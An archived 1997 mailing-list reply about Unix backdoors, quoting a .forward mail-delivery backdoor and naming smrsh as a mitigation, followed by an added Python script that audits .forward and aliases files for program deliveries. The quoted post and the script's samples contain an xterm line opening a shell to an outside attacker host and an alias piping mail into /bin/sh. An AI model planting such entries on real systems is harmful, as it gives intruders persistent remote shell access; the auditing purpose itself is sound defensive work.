Re: Backdoor Paper
Darren Reed (avalon@COOMBS.ANU.EDU.AU)
Tue, 26 Aug 1997 10:31:36 +1000
In some mail from Evil Pete, sie said:
>
> >Here's a paper I wrote on backdoors.  Feedback welcome.
>
> <snip>
>
> you may want to add:
>
>
>     .forward Backdoor
>
>     On Unix machines, placing commands into the .forward file was also
>     a common method of regaining access.  For the account ``username''
>     a .forward file might be constructed as follows:
>
>         \username
>         |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
>
>     Permutations of this method include alteration of the system's mail
>     aliases file (most commonly located at /etc/aliases).  Note that
>     this is a simple permutation; the more advanced can run a simple
>     script from the .forward file that can take arbitrary commands via
>     stdin (after minor preprocessing).
>
>
>                 -Pete
>
> PS: The above method is also useful for gaining access to a company's
>         mailhub (assuming there is a shared home directory FS on
>         the client and server).
Using smrsh can effectively negate this backdoor (although it's quite
possibly still a problem if you allow things like elm's filter or
procmail which can run programs themselves...).
Darren
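The .forward and /etc/aliases program deliveries described in Pete's note, and the smrsh restriction Darren mentions, as an added audit example that is not part of the original thread and not code from either poster. It parses sendmail-style delivery entries, flags every program (pipe) delivery, and predicts what smrsh would do with it. The sample .forward and aliases contents are constructed for the example (only the xterm command line is taken from the post), the allowed-command set stands in for a listing of /etc/smrsh, and the smrsh rules (metacharacter rejection, lookup by basename with the path stripped) are an approximation of sendmail's smrsh, not a reimplementation of it.

```python
import re
import shlex
from typing import Dict, List, Tuple

# Constructed sample .forward. The xterm line is the one quoted in the post;
# the other entries are made up to exercise each delivery type.
SAMPLE_FORWARD = r'''\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
"|/usr/local/bin/procmail"
/var/mail/username.archive
username@example.org
'''

# Constructed sample /etc/aliases (hypothetical entries).
SAMPLE_ALIASES = r'''postmaster: root
helpdesk: "|/usr/local/bin/ticket-intake"
root: |/bin/sh -c 'cat > /tmp/.cmds; sh /tmp/.cmds'
'''

# Assumed contents of the smrsh command directory (/etc/smrsh on most systems).
# A real audit would list that directory; this set is constructed.
SMRSH_ALLOWED = {"procmail", "vacation", "ticket-intake"}

# Approximation of the characters smrsh refuses anywhere on a command line
# (later sendmail releases also reject '|' and '&').
SMRSH_BAD_CHARS = set('`<>;$()\r\n|&')


def parse_delivery_lines(text: str) -> List[Dict[str, str]]:
    """Split .forward-style content into delivery entries.

    Entries are separated by newlines or commas (so a program argument that
    itself contains a comma is not handled). A program delivery is written
    as |cmd, |"cmd args", or "|cmd args"; \\user is unescaped local delivery;
    /path is file delivery; :include: pulls in another file.
    """
    entries = []
    for raw in re.split(r'[\n,]', text):
        item = raw.strip()
        if not item or item.startswith('#'):
            continue
        kind, payload = 'address', item
        if item.startswith('"|') and item.endswith('"'):
            kind, payload = 'program', item[2:-1]
        elif item.startswith('|'):
            kind, payload = 'program', item[1:].strip('"')
        elif item.startswith('\\'):
            kind, payload = 'local', item[1:]
        elif item.startswith('/'):
            kind, payload = 'file', item
        elif item.startswith(':include:'):
            kind, payload = 'include', item[len(':include:'):]
        entries.append({'kind': kind, 'value': payload, 'raw': item})
    return entries


def smrsh_verdict(cmd: str, allowed=SMRSH_ALLOWED) -> str:
    """Predict whether smrsh would execute a program delivery (approximation).

    smrsh rejects command lines containing shell metacharacters, strips any
    leading path from the program name and only runs it if a command of that
    basename exists in its command directory.
    """
    if any(ch in SMRSH_BAD_CHARS for ch in cmd):
        return 'rejected: metacharacter'
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return 'rejected: unparseable'
    if not argv:
        return 'rejected: empty'
    base = argv[0].rsplit('/', 1)[-1]
    if base not in allowed:
        return f'rejected: {base} not in smrsh dir'
    return f'allowed: {base}'


def audit_forward(text: str, allowed=SMRSH_ALLOWED) -> List[Tuple[str, str]]:
    """Return (command, verdict) for every program delivery in a .forward."""
    return [(e['value'], smrsh_verdict(e['value'], allowed))
            for e in parse_delivery_lines(text) if e['kind'] == 'program']


def audit_aliases(text: str, allowed=SMRSH_ALLOWED) -> Dict[str, List[Tuple[str, str]]]:
    """Return program deliveries per alias, for aliases that have any."""
    out = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith('#') or ':' not in line:
            continue
        name, rhs = line.split(':', 1)
        findings = audit_forward(rhs, allowed)
        if findings:
            out[name.strip()] = findings
    return out


if __name__ == '__main__':
    for cmd, verdict in audit_forward(SAMPLE_FORWARD):
        print(f'.forward: {cmd!r} -> {verdict}')
    for name, findings in audit_aliases(SAMPLE_ALIASES).items():
        for cmd, verdict in findings:
            print(f'alias {name}: {cmd!r} -> {verdict}')
```

Run against the samples, the xterm backdoor and the shell alias are both rejected, but the procmail delivery is allowed, which is exactly Darren's caveat: once procmail (or elm's filter) is in /etc/smrsh, a user's .procmailrc can run arbitrary programs without ever tripping smrsh, so an audit also has to cover the recipes those programs read.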